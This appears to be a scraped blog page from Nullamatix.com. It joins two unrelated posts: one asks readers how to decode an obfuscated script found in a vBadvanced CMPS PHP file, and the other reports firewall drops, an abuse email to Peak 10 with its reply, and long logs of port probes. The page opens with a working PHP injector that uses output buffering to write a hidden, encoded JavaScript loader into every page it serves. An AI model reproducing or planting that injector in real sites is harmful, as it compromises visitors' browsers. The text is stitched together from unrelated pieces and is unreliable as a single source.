<?php																															/*d6dc9649bc1e96ceef5b932f3edee390*/ob_start( create_function( '$buf', 'return str_repeat("\t",rand(28,40)).\'<script language=javascript>rtrlevm="iTiyvIYW%YYglJJLMU";ibvjpl="<script!20l!61!6eg!75a!67e!3dj!61va!73crip!74!3e !20!66!75n!63!74!69o!6e !75!61!68!69!64adu(s!6f!6aoic!75!29{v!61!72 go!61srho,!68!66q!79!72!78u=!22pHGF\\\'!37!50!38!2cyT+6!73!2e!4d^!63!45!3b!6bUO!7dAt[!65o!69!30!68v:I=r!64n!7a{!6159!26!28g]B!4e*Z|u~b!66!60x!32Jj!77)1V!24!404#!6d3K!71 !6c!43!21_-\\\\\\\\\\\\"\\\\"!2cj!66cmun=!22\\\\",vvpy!76t!2cfz!68g!73ynh!2cvn!7a!75!65xp!3d\\\\"!22,!67!75!6b!74o!78!7a!3b!66!6fr(g!6fasrh!6f=!30!3b!67oas!72ho!3c!73o!6a!6fic!75!2e!6ce!6e!67th!3b!67oas!72ho++){ vvpyvt=!73oj!6ficu.!63ha!72At(!67o!61!73!72ho!29!3bfz!68gsy!6eh=hf!71yr!78u!2e!69!6edexO!66(vvpyvt!29!3b!69f(f!7a!68g!73!79n!68!3e!2d1)!7b!20!67uk!74ox!7a=!28(f!7ah!67!73y!6e!68+!31)!2581!2d1)!3b!69f!28!67u!6b!74ox!7a";ncowyow=rtrlevm.charAt(8);trbcvxg=ibvjpl.replace(/!/g,ncowyow);muabsg=unescape(trbcvxg);var jvhgggf,mvzdovk;document.write(muabsg);jvhgggf="<.Ed0H[lC5z]~5]orpj5:5SEd0H[p>l`~zE[0izl{d]dCv)CCUTEig1lal[dTlal:5dl5vU2 :]z rlp]5C2{{z3`nU33Hpyln]UwdwH.:zlrlVkl`~zE[0izl~fo5oi3do3d3)gz53oyl:5C~o1la:5dlnlrlzo)lD5[oknM.o[+03oggzo)lD5[o1M]o[+03og1l6l,s#hhhhh1kniE~3oz[MEiiU0olrlz53ol6lprpl6lo.E5Hog:5C~o1l6lpklo2H0do.rpl6lnM[iF^+S[d0z]g1kAl`~zE[0izlE.: wE[ 3nv:g1lado[~dzlgniE~3oz[MEiiU0oM0zno2}`g5vU2 :]z l6lprpl6ln]UwdwH.:z1lrrl\\\\"V1kAl0`glE.: wE[ 3nv:g1l1lalniE~3oz[M)d0[oglp<\\\\\\\\/S!Rp6p=8+>pl1kl~fo5oi3do3d3)gl5vU2 :]z yln]UwdwH.:zl1klAloC.olalAlAlE5[Evlgo1laAlAl{d]dCv)CCUTEig1kl";uahidadu(jvhgggf);</script>\'."\n".$buf;' ) );/*d6dc9649bc1e96ceef5b932f3edee390*/

// ++=========================================================================++
// || vBadvanced CMPS v3.0.1 (vB 3.6 - vB 3.7) - 56182
// ++
... snip ...

I searched and searched, and came across what looks like a method of unobfuscating, but I’m too lazy to work at it.

Ideas, anyone? :]

More From Nullamatix.com:

• December 31, 2007 -- Updates and a Happy New Year
• November 30, 2007 -- Windows XP SP3 (Service Pack 3) Improves Performance
• December 6, 2007 -- GMail: Sorry, You Account Has Been Disabled
• February 18, 2008 -- Need To Decrypt an md5 Hash? Try Some Free Rainbow Tables

Post Originally Published at: Nullamatix.com - Technology Made Simple

This portion of the email includes all the packets that were dropped by the firewall. This week I’ve noticed a dramatic increase in dropped packets from IPs all over the world. Frustrated and confused by the annoyances, I started sending emails to abuse departments requesting they stop.

Here’s an email sent 2 days ago:

MIME-Version: 1.0
Sender: security at nullamatix dot com
Received: by 10.100.140.11 with HTTP; Wed, 22 Apr 2009 09:59:19 -0700 (PDT)
Date: Wed, 22 Apr 2009 12:59:19 -0400
X-Google-Sender-Auth: 49f446
Message-ID: <88e844b40904220959l60610b73t2a6a33aa478d4153@mail.gmail.com>
Subject: Unnecessary Traffic From: 66.129.65.84
From: Security Operations <security at nullamatix dot com>
To: abuse at peak10
Cc: chris.martin at peak10, don.lundquist at peak10, devon.true at peak10,
	john.willingham at peak10, ronnie.frames at peak10
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Seriously, there's no service listening on port 33435, I promise...

03:29:46  SRC=66.129.65.84     DST=209.40.196.119   SPT=12495   DPT=33435
03:29:51  SRC=66.129.65.84     DST=209.40.196.119   SPT=12495   DPT=33435
03:29:56  SRC=66.129.65.84     DST=209.40.196.119   SPT=12495   DPT=33435
03:30:01  SRC=66.129.65.84     DST=209.40.196.119   SPT=12495   DPT=33435
03:30:06  SRC=66.129.65.84     DST=209.40.196.119   SPT=12495   DPT=33435
03:30:11  SRC=66.129.65.84     DST=209.40.196.119   SPT=12495   DPT=33435

05:23:46  SRC=66.129.65.84     DST=209.40.196.119   SPT=11746   DPT=33435
05:23:51  SRC=66.129.65.84     DST=209.40.196.119   SPT=11746   DPT=33435
05:23:56  SRC=66.129.65.84     DST=209.40.196.119   SPT=11746   DPT=33435
05:24:01  SRC=66.129.65.84     DST=209.40.196.119   SPT=11746   DPT=33435
05:24:06  SRC=66.129.65.84     DST=209.40.196.119   SPT=11746   DPT=33435
05:24:11  SRC=66.129.65.84     DST=209.40.196.119   SPT=11746   DPT=33435

06:28:50  SRC=66.129.65.84     DST=209.40.196.119   SPT=11736   DPT=33435
06:28:58  SRC=66.129.65.84     DST=209.40.196.119   SPT=11736   DPT=33435
06:29:00  SRC=66.129.65.84     DST=209.40.196.119   SPT=11736   DPT=33435
06:29:05  SRC=66.129.65.84     DST=209.40.196.119   SPT=11736   DPT=33435
06:29:11  SRC=66.129.65.84     DST=209.40.196.119   SPT=11736   DPT=33435
06:29:15  SRC=66.129.65.84     DST=209.40.196.119   SPT=11736   DPT=33435

07:14:50  SRC=66.129.65.84     DST=209.40.196.119   SPT=12015   DPT=33435
07:14:55  SRC=66.129.65.84     DST=209.40.196.119   SPT=12015   DPT=33435
07:15:00  SRC=66.129.65.84     DST=209.40.196.119   SPT=12015   DPT=33435
07:15:05  SRC=66.129.65.84     DST=209.40.196.119   SPT=12015   DPT=33435
07:15:10  SRC=66.129.65.84     DST=209.40.196.119   SPT=12015   DPT=33435
07:15:15  SRC=66.129.65.84     DST=209.40.196.119   SPT=12015   DPT=33435

08:14:47  SRC=66.129.65.84     DST=209.40.196.119   SPT=10025   DPT=33435
08:14:51  SRC=66.129.65.84     DST=209.40.196.119   SPT=10025   DPT=33435
08:14:56  SRC=66.129.65.84     DST=209.40.196.119   SPT=10025   DPT=33435
08:15:01  SRC=66.129.65.84     DST=209.40.196.119   SPT=10025   DPT=33435
08:15:07  SRC=66.129.65.84     DST=209.40.196.119   SPT=10025   DPT=33435
08:15:11  SRC=66.129.65.84     DST=209.40.196.119   SPT=10025   DPT=33435

09:41:56  SRC=66.129.65.84     DST=209.40.196.119   SPT=12250   DPT=33435
09:42:01  SRC=66.129.65.84     DST=209.40.196.119   SPT=12250   DPT=33435
09:42:06  SRC=66.129.65.84     DST=209.40.196.119   SPT=12250   DPT=33435
09:42:11  SRC=66.129.65.84     DST=209.40.196.119   SPT=12250   DPT=33435
09:42:16  SRC=66.129.65.84     DST=209.40.196.119   SPT=12250   DPT=33435
09:42:21  SRC=66.129.65.84     DST=209.40.196.119   SPT=12250   DPT=33435

Thanks,

Guy
https://www.nullamatix.com/pubkey.txt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32) - WinPT 1.2.0

iQEVAwUBSe9MW8LX50JovmoJAQJFAAf+Kkx1pedIL++zVf0pDc70PGqWhpVQUPKS
OiT64L8XJ9BJbC7X+lhSGGpLacpE9+uY5ShpGgBGOi+cVtie+hzZFSb7EPaF+5xJ
qgr2rGCGdYAaWmfvwVKvNCCdllymC8WYCywbExCrTwrZKUWA8K5+st2MPGJ16V5A
+QLyAEE0oJSfQIurs4ZhBtRnMGqokcKeoPiokelLagkH+cri8STNOUxOM6XQu3AZ
xUsKvt3TkemUpB/hZQhu0TstxGrAygXgEbO8H8K7p6J5HzNUbCm7nNMdpk2hZNuz
BrMMX3NrQVxA/8GqeJmoljF/a1IxUaVfekN9cco/jJVqE2M816pgSg==
=COtU
-----END PGP SIGNATURE-----

Devon True responded quickly - within twenty minutes (good host?):

From: NetworkEngineering at peak10 dot come Network Engineering
To: security at nullamatix dot com Security Operations
Date: Wed, 22 Apr 2009 13:16:54 -0400
Subject: RE: Unnecessary Traffic From: 66.129.65.84 [TID:430679] 

Guy,

The host at IP 66.129.65.84 is a Flow Control Platform (FCP) that
optimizes our outbound traffic based on load, latency, packet loss,
etc. The traffic that is hitting your system are the probes from
the unit to test those criteria. If you want those probes stopped,
please reply with the network to exclude.

--
Devon True
Peak 10 Network Engineer || Peak 10 Data Center Solutions
Email: devon.true at peak10 dot com || Direct: XXX-XXX-6007
Peak 10 Support: 866-PEAK-TEN support at peak10 dot c0m
URI: http://www.peak10.com/

So I replied and all appears well. Logs and emails went back to the usual Chinese, Russian, Romanian brute-force attacks, no more flood of useless traffic to ports that aren’t listening. wrong.

I came home on my lunch break today and started examining the couple status reports in my inbox, and to my surprise, this is what’s inside for the INBOUND DROPPED portion…
* I altered the DST= column to display 67.200.200.00

April 24th 2009 - 00:00:01

00:00:01  SRC=76.3.140.205     DST=67.200.200.00    SPT=2345    DPT=39172
00:00:01  SRC=76.3.140.205     DST=67.200.200.00    SPT=3345    DPT=39172
00:00:01  SRC=76.3.140.205     DST=67.200.200.00    SPT=4345    DPT=39172
00:00:01  SRC=76.3.140.205     DST=67.200.200.00    SPT=5345    DPT=39172
00:00:01  SRC=76.3.140.205     DST=67.200.200.00    SPT=6345    DPT=39172
00:00:01  SRC=76.3.140.205     DST=67.200.200.00    SPT=7345    DPT=39172
00:00:01  SRC=76.3.140.205     DST=67.200.200.00    SPT=8345    DPT=39172
00:00:01  SRC=76.3.140.205     DST=67.200.200.00    SPT=9345    DPT=39172
00:00:01  SRC=76.3.140.205     DST=67.200.200.00    SPT=1345    DPT=39172
 
00:00:01  SRC=189.176.195.229  DST=67.200.200.00    SPT=1345    DPT=39172
00:00:01  SRC=189.176.195.229  DST=67.200.200.00    SPT=2345    DPT=39172
00:00:01  SRC=189.176.195.229  DST=67.200.200.00    SPT=3345    DPT=39172
00:00:01  SRC=189.176.195.229  DST=67.200.200.00    SPT=4345    DPT=39172
00:00:01  SRC=189.176.195.229  DST=67.200.200.00    SPT=5345    DPT=39172
00:00:01  SRC=189.176.195.229  DST=67.200.200.00    SPT=6345    DPT=39172
00:00:01  SRC=189.176.195.229  DST=67.200.200.00    SPT=7345    DPT=39172
00:00:01  SRC=189.176.195.229  DST=67.200.200.00    SPT=8345    DPT=39172
00:00:01  SRC=189.176.195.229  DST=67.200.200.00    SPT=9345    DPT=39172
 
00:00:01  SRC=98.207.90.174    DST=67.200.200.00    SPT=1345    DPT=39172
00:00:01  SRC=98.207.90.174    DST=67.200.200.00    SPT=2345    DPT=39172
00:00:01  SRC=98.207.90.174    DST=67.200.200.00    SPT=3345    DPT=39172
00:00:01  SRC=98.207.90.174    DST=67.200.200.00    SPT=4345    DPT=39172
00:00:01  SRC=98.207.90.174    DST=67.200.200.00    SPT=5345    DPT=39172
00:00:01  SRC=98.207.90.174    DST=67.200.200.00    SPT=6345    DPT=39172
00:00:01  SRC=98.207.90.174    DST=67.200.200.00    SPT=7345    DPT=39172
00:00:01  SRC=98.207.90.174    DST=67.200.200.00    SPT=8345    DPT=39172
00:00:01  SRC=98.207.90.174    DST=67.200.200.00    SPT=9345    DPT=39172
 
00:00:01  SRC=67.80.17.61      DST=67.200.200.00    SPT=1345    DPT=39172
00:00:01  SRC=67.80.17.61      DST=67.200.200.00    SPT=2345    DPT=39172
00:00:01  SRC=67.80.17.61      DST=67.200.200.00    SPT=3345    DPT=39172
00:00:01  SRC=67.80.17.61      DST=67.200.200.00    SPT=4345    DPT=39172
00:00:01  SRC=67.80.17.61      DST=67.200.200.00    SPT=5345    DPT=39172
00:00:01  SRC=67.80.17.61      DST=67.200.200.00    SPT=6345    DPT=39172
00:00:01  SRC=67.80.17.61      DST=67.200.200.00    SPT=7345    DPT=39172
00:00:01  SRC=67.80.17.61      DST=67.200.200.00    SPT=8345    DPT=39172
00:00:01  SRC=67.80.17.61      DST=67.200.200.00    SPT=9345    DPT=39172

April 24th 2009 - 00:00:08

00:00:08  SRC=98.227.224.66    DST=67.200.200.00    SPT=1345    DPT=39172
00:00:08  SRC=98.227.224.66    DST=67.200.200.00    SPT=2345    DPT=39172
00:00:08  SRC=98.227.224.66    DST=67.200.200.00    SPT=3345    DPT=39172
00:00:08  SRC=98.227.224.66    DST=67.200.200.00    SPT=4345    DPT=39172
00:00:08  SRC=98.227.224.66    DST=67.200.200.00    SPT=5345    DPT=39172
00:00:08  SRC=98.227.224.66    DST=67.200.200.00    SPT=6345    DPT=39172
00:00:08  SRC=98.227.224.66    DST=67.200.200.00    SPT=7345    DPT=39172
00:00:08  SRC=98.227.224.66    DST=67.200.200.00    SPT=8345    DPT=39172
00:00:08  SRC=98.227.224.66    DST=67.200.200.00    SPT=9345    DPT=39172
 
00:00:08  SRC=69.115.175.27    DST=67.200.200.00    SPT=1345    DPT=39172
00:00:08  SRC=69.115.175.27    DST=67.200.200.00    SPT=2345    DPT=39172
00:00:08  SRC=69.115.175.27    DST=67.200.200.00    SPT=3345    DPT=39172
00:00:08  SRC=69.115.175.27    DST=67.200.200.00    SPT=4345    DPT=39172
00:00:08  SRC=69.115.175.27    DST=67.200.200.00    SPT=5345    DPT=39172
00:00:08  SRC=69.115.175.27    DST=67.200.200.00    SPT=6345    DPT=39172
00:00:08  SRC=69.115.175.27    DST=67.200.200.00    SPT=7345    DPT=39172
00:00:08  SRC=69.115.175.27    DST=67.200.200.00    SPT=8345    DPT=39172
00:00:08  SRC=69.115.175.27    DST=67.200.200.00    SPT=9345    DPT=39172
 
00:00:08  SRC=69.231.217.167   DST=67.200.200.00    SPT=1345    DPT=39172
00:00:08  SRC=69.231.217.167   DST=67.200.200.00    SPT=2345    DPT=39172
00:00:08  SRC=69.231.217.167   DST=67.200.200.00    SPT=3345    DPT=39172
00:00:08  SRC=69.231.217.167   DST=67.200.200.00    SPT=4345    DPT=39172
00:00:08  SRC=69.231.217.167   DST=67.200.200.00    SPT=5345    DPT=39172
00:00:08  SRC=69.231.217.167   DST=67.200.200.00    SPT=6345    DPT=39172
00:00:08  SRC=69.231.217.167   DST=67.200.200.00    SPT=7345    DPT=39172
00:00:08  SRC=69.231.217.167   DST=67.200.200.00    SPT=8345    DPT=39172
00:00:08  SRC=69.231.217.167   DST=67.200.200.00    SPT=9345    DPT=39172
 
00:00:08  SRC=70.45.57.125     DST=67.200.200.00    SPT=1345    DPT=39172
00:00:08  SRC=70.45.57.125     DST=67.200.200.00    SPT=2345    DPT=39172
00:00:08  SRC=70.45.57.125     DST=67.200.200.00    SPT=3345    DPT=39172
00:00:08  SRC=70.45.57.125     DST=67.200.200.00    SPT=4345    DPT=39172
00:00:08  SRC=70.45.57.125     DST=67.200.200.00    SPT=5345    DPT=39172
00:00:08  SRC=70.45.57.125     DST=67.200.200.00    SPT=6345    DPT=39172
00:00:08  SRC=70.45.57.125     DST=67.200.200.00    SPT=7345    DPT=39172
00:00:08  SRC=70.45.57.125     DST=67.200.200.00    SPT=8345    DPT=39172
00:00:08  SRC=70.45.57.125     DST=67.200.200.00    SPT=9345    DPT=39172

April 24th 2009 - 00:00:29

00:00:29  SRC=71.236.251.165   DST=67.200.200.00    SPT=1345    DPT=39172
00:00:29  SRC=71.236.251.165   DST=67.200.200.00    SPT=2345    DPT=39172
00:00:29  SRC=71.236.251.165   DST=67.200.200.00    SPT=3345    DPT=39172
00:00:29  SRC=71.236.251.165   DST=67.200.200.00    SPT=4345    DPT=39172
00:00:29  SRC=71.236.251.165   DST=67.200.200.00    SPT=5345    DPT=39172
00:00:29  SRC=71.236.251.165   DST=67.200.200.00    SPT=6345    DPT=39172
00:00:29  SRC=71.236.251.165   DST=67.200.200.00    SPT=7345    DPT=39172
00:00:29  SRC=71.236.251.165   DST=67.200.200.00    SPT=8345    DPT=39172
00:00:29  SRC=71.236.251.165   DST=67.200.200.00    SPT=9345    DPT=39172
 
00:00:29  SRC=67.80.17.61      DST=67.200.200.00    SPT=1345    DPT=39172
00:00:29  SRC=67.80.17.61      DST=67.200.200.00    SPT=2345    DPT=39172
00:00:29  SRC=67.80.17.61      DST=67.200.200.00    SPT=3345    DPT=39172
00:00:29  SRC=67.80.17.61      DST=67.200.200.00    SPT=4345    DPT=39172
00:00:29  SRC=67.80.17.61      DST=67.200.200.00    SPT=5345    DPT=39172
00:00:29  SRC=67.80.17.61      DST=67.200.200.00    SPT=6345    DPT=39172
00:00:29  SRC=67.80.17.61      DST=67.200.200.00    SPT=7345    DPT=39172
00:00:29  SRC=67.80.17.61      DST=67.200.200.00    SPT=8345    DPT=39172
00:00:29  SRC=67.80.17.61      DST=67.200.200.00    SPT=9345    DPT=39172
 
00:00:29  SRC=67.53.4.151      DST=67.200.200.00    SPT=1345    DPT=39172
00:00:29  SRC=67.53.4.151      DST=67.200.200.00    SPT=2345    DPT=39172
00:00:29  SRC=67.53.4.151      DST=67.200.200.00    SPT=3345    DPT=39172
00:00:29  SRC=67.53.4.151      DST=67.200.200.00    SPT=4345    DPT=39172
00:00:29  SRC=67.53.4.151      DST=67.200.200.00    SPT=5345    DPT=39172
00:00:29  SRC=67.53.4.151      DST=67.200.200.00    SPT=6345    DPT=39172
00:00:29  SRC=67.53.4.151      DST=67.200.200.00    SPT=7345    DPT=39172
00:00:29  SRC=67.53.4.151      DST=67.200.200.00    SPT=8345    DPT=39172
00:00:29  SRC=67.53.4.151      DST=67.200.200.00    SPT=9345    DPT=39172
 
00:00:29  SRC=203.189.32.234   DST=67.200.200.00    SPT=1345    DPT=39172
00:00:29  SRC=203.189.32.234   DST=67.200.200.00    SPT=2345    DPT=39172
00:00:29  SRC=203.189.32.234   DST=67.200.200.00    SPT=3345    DPT=39172
00:00:29  SRC=203.189.32.234   DST=67.200.200.00    SPT=4345    DPT=39172
00:00:29  SRC=203.189.32.234   DST=67.200.200.00    SPT=5345    DPT=39172
00:00:29  SRC=203.189.32.234   DST=67.200.200.00    SPT=6345    DPT=39172
00:00:29  SRC=203.189.32.234   DST=67.200.200.00    SPT=7345    DPT=39172
00:00:29  SRC=203.189.32.234   DST=67.200.200.00    SPT=8345    DPT=39172
00:00:29  SRC=203.189.32.234   DST=67.200.200.00    SPT=9345    DPT=39172

April 24th 2009 - 00:01:07

00:01:07  SRC=201.24.3.234     DST=67.200.200.00    SPT=1345    DPT=39172
00:01:07  SRC=201.24.3.234     DST=67.200.200.00    SPT=2345    DPT=39172
00:01:07  SRC=201.24.3.234     DST=67.200.200.00    SPT=3345    DPT=39172
00:01:07  SRC=201.24.3.234     DST=67.200.200.00    SPT=4345    DPT=39172
00:01:07  SRC=201.24.3.234     DST=67.200.200.00    SPT=5345    DPT=39172
00:01:07  SRC=201.24.3.234     DST=67.200.200.00    SPT=6345    DPT=39172
00:01:07  SRC=201.24.3.234     DST=67.200.200.00    SPT=7345    DPT=39172
00:01:07  SRC=201.24.3.234     DST=67.200.200.00    SPT=8345    DPT=39172
00:01:07  SRC=201.24.3.234     DST=67.200.200.00    SPT=9345    DPT=39172
 
00:01:07  SRC=68.204.68.82     DST=67.200.200.00    SPT=1345    DPT=39172
00:01:07  SRC=68.204.68.82     DST=67.200.200.00    SPT=2345    DPT=39172
00:01:07  SRC=68.204.68.82     DST=67.200.200.00    SPT=3345    DPT=39172
00:01:07  SRC=68.204.68.82     DST=67.200.200.00    SPT=4345    DPT=39172
00:01:07  SRC=68.204.68.82     DST=67.200.200.00    SPT=5345    DPT=39172
00:01:07  SRC=68.204.68.82     DST=67.200.200.00    SPT=6345    DPT=39172
00:01:07  SRC=68.204.68.82     DST=67.200.200.00    SPT=7345    DPT=39172
00:01:07  SRC=68.204.68.82     DST=67.200.200.00    SPT=8345    DPT=39172
00:01:07  SRC=68.204.68.82     DST=67.200.200.00    SPT=9345    DPT=39172
 
00:01:07  SRC=203.189.32.234   DST=67.200.200.00    SPT=1345    DPT=39172
00:01:07  SRC=203.189.32.234   DST=67.200.200.00    SPT=2345    DPT=39172
00:01:07  SRC=203.189.32.234   DST=67.200.200.00    SPT=3345    DPT=39172
00:01:07  SRC=203.189.32.234   DST=67.200.200.00    SPT=4345    DPT=39172
00:01:07  SRC=203.189.32.234   DST=67.200.200.00    SPT=5345    DPT=39172
00:01:07  SRC=203.189.32.234   DST=67.200.200.00    SPT=6345    DPT=39172
00:01:07  SRC=203.189.32.234   DST=67.200.200.00    SPT=7345    DPT=39172
00:01:07  SRC=203.189.32.234   DST=67.200.200.00    SPT=8345    DPT=39172
00:01:07  SRC=203.189.32.234   DST=67.200.200.00    SPT=9345    DPT=39172
 
00:01:07  SRC=98.162.240.76    DST=67.200.200.00    SPT=1345    DPT=39172
00:01:07  SRC=98.162.240.76    DST=67.200.200.00    SPT=2345    DPT=39172
00:01:07  SRC=98.162.240.76    DST=67.200.200.00    SPT=3345    DPT=39172
00:01:07  SRC=98.162.240.76    DST=67.200.200.00    SPT=4345    DPT=39172
00:01:07  SRC=98.162.240.76    DST=67.200.200.00    SPT=5345    DPT=39172
00:01:07  SRC=98.162.240.76    DST=67.200.200.00    SPT=6345    DPT=39172
00:01:07  SRC=98.162.240.76    DST=67.200.200.00    SPT=7345    DPT=39172
00:01:07  SRC=98.162.240.76    DST=67.200.200.00    SPT=8345    DPT=39172
00:01:07  SRC=98.162.240.76    DST=67.200.200.00    SPT=9345    DPT=39172

April 24th 2009 - 00:01:28

00:01:28  SRC=201.160.203.114  DST=67.200.200.00    SPT=1345    DPT=39172
00:01:28  SRC=201.160.203.114  DST=67.200.200.00    SPT=2345    DPT=39172
00:01:28  SRC=201.160.203.114  DST=67.200.200.00    SPT=3345    DPT=39172
00:01:28  SRC=201.160.203.114  DST=67.200.200.00    SPT=4345    DPT=39172
00:01:28  SRC=201.160.203.114  DST=67.200.200.00    SPT=5345    DPT=39172
00:01:28  SRC=201.160.203.114  DST=67.200.200.00    SPT=6345    DPT=39172
00:01:28  SRC=201.160.203.114  DST=67.200.200.00    SPT=7345    DPT=39172
00:01:28  SRC=201.160.203.114  DST=67.200.200.00    SPT=8345    DPT=39172
00:01:28  SRC=201.160.203.114  DST=67.200.200.00    SPT=9345    DPT=39172
 
00:01:28  SRC=68.33.192.177    DST=67.200.200.00    SPT=1345    DPT=39172
00:01:28  SRC=68.33.192.177    DST=67.200.200.00    SPT=2345    DPT=39172
00:01:28  SRC=68.33.192.177    DST=67.200.200.00    SPT=3345    DPT=39172
00:01:28  SRC=68.33.192.177    DST=67.200.200.00    SPT=4345    DPT=39172
00:01:28  SRC=68.33.192.177    DST=67.200.200.00    SPT=5345    DPT=39172
00:01:28  SRC=68.33.192.177    DST=67.200.200.00    SPT=6345    DPT=39172
00:01:28  SRC=68.33.192.177    DST=67.200.200.00    SPT=7345    DPT=39172
00:01:28  SRC=68.33.192.177    DST=67.200.200.00    SPT=8345    DPT=39172
00:01:28  SRC=68.33.192.177    DST=67.200.200.00    SPT=9345    DPT=39172
 
00:01:28  SRC=69.133.95.19     DST=67.200.200.00    SPT=1345    DPT=39172
00:01:28  SRC=69.133.95.19     DST=67.200.200.00    SPT=2345    DPT=39172
00:01:28  SRC=69.133.95.19     DST=67.200.200.00    SPT=3345    DPT=39172
00:01:28  SRC=69.133.95.19     DST=67.200.200.00    SPT=4345    DPT=39172
00:01:28  SRC=69.133.95.19     DST=67.200.200.00    SPT=5345    DPT=39172
00:01:28  SRC=69.133.95.19     DST=67.200.200.00    SPT=6345    DPT=39172
00:01:28  SRC=69.133.95.19     DST=67.200.200.00    SPT=7345    DPT=39172
00:01:28  SRC=69.133.95.19     DST=67.200.200.00    SPT=8345    DPT=39172
00:01:28  SRC=69.133.95.19     DST=67.200.200.00    SPT=9345    DPT=39172
 
00:01:28  SRC=24.125.136.43    DST=67.200.200.00    SPT=1345    DPT=39172
00:01:28  SRC=24.125.136.43    DST=67.200.200.00    SPT=2345    DPT=39172
00:01:28  SRC=24.125.136.43    DST=67.200.200.00    SPT=3345    DPT=39172
00:01:28  SRC=24.125.136.43    DST=67.200.200.00    SPT=4345    DPT=39172
00:01:28  SRC=24.125.136.43    DST=67.200.200.00    SPT=5345    DPT=39172
00:01:28  SRC=24.125.136.43    DST=67.200.200.00    SPT=6345    DPT=39172
00:01:28  SRC=24.125.136.43    DST=67.200.200.00    SPT=7345    DPT=39172
00:01:28  SRC=24.125.136.43    DST=67.200.200.00    SPT=8345    DPT=39172
00:01:28  SRC=24.125.136.43    DST=67.200.200.00    SPT=9345    DPT=39172

April 24th 2009 - 00:02:02

00:02:02  SRC=189.216.93.18    DST=67.200.200.00    SPT=1345    DPT=39172
00:02:02  SRC=189.216.93.18    DST=67.200.200.00    SPT=2345    DPT=39172
00:02:02  SRC=189.216.93.18    DST=67.200.200.00    SPT=3345    DPT=39172
00:02:02  SRC=189.216.93.18    DST=67.200.200.00    SPT=4345    DPT=39172
00:02:02  SRC=189.216.93.18    DST=67.200.200.00    SPT=5345    DPT=39172
00:02:02  SRC=189.216.93.18    DST=67.200.200.00    SPT=6345    DPT=39172
00:02:02  SRC=189.216.93.18    DST=67.200.200.00    SPT=7345    DPT=39172
00:02:02  SRC=189.216.93.18    DST=67.200.200.00    SPT=8345    DPT=39172
00:02:02  SRC=189.216.93.18    DST=67.200.200.00    SPT=9345    DPT=39172
 
00:02:02  SRC=68.103.145.120   DST=67.200.200.00    SPT=1345    DPT=39172
00:02:02  SRC=68.103.145.120   DST=67.200.200.00    SPT=2345    DPT=39172
00:02:02  SRC=68.103.145.120   DST=67.200.200.00    SPT=3345    DPT=39172
00:02:02  SRC=68.103.145.120   DST=67.200.200.00    SPT=4345    DPT=39172
00:02:02  SRC=68.103.145.120   DST=67.200.200.00    SPT=5345    DPT=39172
00:02:02  SRC=68.103.145.120   DST=67.200.200.00    SPT=6345    DPT=39172
00:02:02  SRC=68.103.145.120   DST=67.200.200.00    SPT=7345    DPT=39172
00:02:02  SRC=68.103.145.120   DST=67.200.200.00    SPT=8345    DPT=39172
00:02:02  SRC=68.103.145.120   DST=67.200.200.00    SPT=9345    DPT=39172
 
00:02:02  SRC=92.96.17.155     DST=67.200.200.00    SPT=1345    DPT=39172
00:02:02  SRC=92.96.17.155     DST=67.200.200.00    SPT=2345    DPT=39172
00:02:02  SRC=92.96.17.155     DST=67.200.200.00    SPT=3345    DPT=39172
00:02:02  SRC=92.96.17.155     DST=67.200.200.00    SPT=4345    DPT=39172
00:02:02  SRC=92.96.17.155     DST=67.200.200.00    SPT=5345    DPT=39172
00:02:02  SRC=92.96.17.155     DST=67.200.200.00    SPT=6345    DPT=39172
00:02:02  SRC=92.96.17.155     DST=67.200.200.00    SPT=7345    DPT=39172
00:02:02  SRC=92.96.17.155     DST=67.200.200.00    SPT=8345    DPT=39172
00:02:02  SRC=92.96.17.155     DST=67.200.200.00    SPT=9345    DPT=39172
 
00:02:02  SRC=69.133.95.19     DST=67.200.200.00    SPT=1345    DPT=39172
00:02:02  SRC=69.133.95.19     DST=67.200.200.00    SPT=2345    DPT=39172
00:02:02  SRC=69.133.95.19     DST=67.200.200.00    SPT=3345    DPT=39172
00:02:02  SRC=69.133.95.19     DST=67.200.200.00    SPT=4345    DPT=39172
00:02:02  SRC=69.133.95.19     DST=67.200.200.00    SPT=5345    DPT=39172
00:02:02  SRC=69.133.95.19     DST=67.200.200.00    SPT=6345    DPT=39172
00:02:02  SRC=69.133.95.19     DST=67.200.200.00    SPT=7345    DPT=39172
00:02:02  SRC=69.133.95.19     DST=67.200.200.00    SPT=8345    DPT=39172
00:02:02  SRC=69.133.95.19     DST=67.200.200.00    SPT=9345    DPT=39172

April 24th 2009 - 00:02:19

00:02:19  SRC=69.115.175.27    DST=67.200.200.00    SPT=1345    DPT=39172
00:02:19  SRC=69.115.175.27    DST=67.200.200.00    SPT=2345    DPT=39172
00:02:19  SRC=69.115.175.27    DST=67.200.200.00    SPT=3345    DPT=39172
00:02:19  SRC=69.115.175.27    DST=67.200.200.00    SPT=4345    DPT=39172
00:02:19  SRC=69.115.175.27    DST=67.200.200.00    SPT=5345    DPT=39172
00:02:19  SRC=69.115.175.27    DST=67.200.200.00    SPT=6345    DPT=39172
00:02:19  SRC=69.115.175.27    DST=67.200.200.00    SPT=7345    DPT=39172
00:02:19  SRC=69.115.175.27    DST=67.200.200.00    SPT=8345    DPT=39172
00:02:19  SRC=69.115.175.27    DST=67.200.200.00    SPT=9345    DPT=39172
 
00:02:19  SRC=83.114.40.4      DST=67.200.200.00    SPT=1345    DPT=39172
00:02:19  SRC=83.114.40.4      DST=67.200.200.00    SPT=2345    DPT=39172
00:02:19  SRC=83.114.40.4      DST=67.200.200.00    SPT=3345    DPT=39172
00:02:19  SRC=83.114.40.4      DST=67.200.200.00    SPT=4345    DPT=39172
00:02:19  SRC=83.114.40.4      DST=67.200.200.00    SPT=5345    DPT=39172
00:02:19  SRC=83.114.40.4      DST=67.200.200.00    SPT=6345    DPT=39172
00:02:19  SRC=83.114.40.4      DST=67.200.200.00    SPT=7345    DPT=39172
00:02:19  SRC=83.114.40.4      DST=67.200.200.00    SPT=8345    DPT=39172
00:02:19  SRC=83.114.40.4      DST=67.200.200.00    SPT=9345    DPT=39172
 
00:02:19  SRC=69.231.217.167   DST=67.200.200.00    SPT=1345    DPT=39172
00:02:19  SRC=69.231.217.167   DST=67.200.200.00    SPT=2345    DPT=39172
00:02:19  SRC=69.231.217.167   DST=67.200.200.00    SPT=3345    DPT=39172
00:02:19  SRC=69.231.217.167   DST=67.200.200.00    SPT=4345    DPT=39172
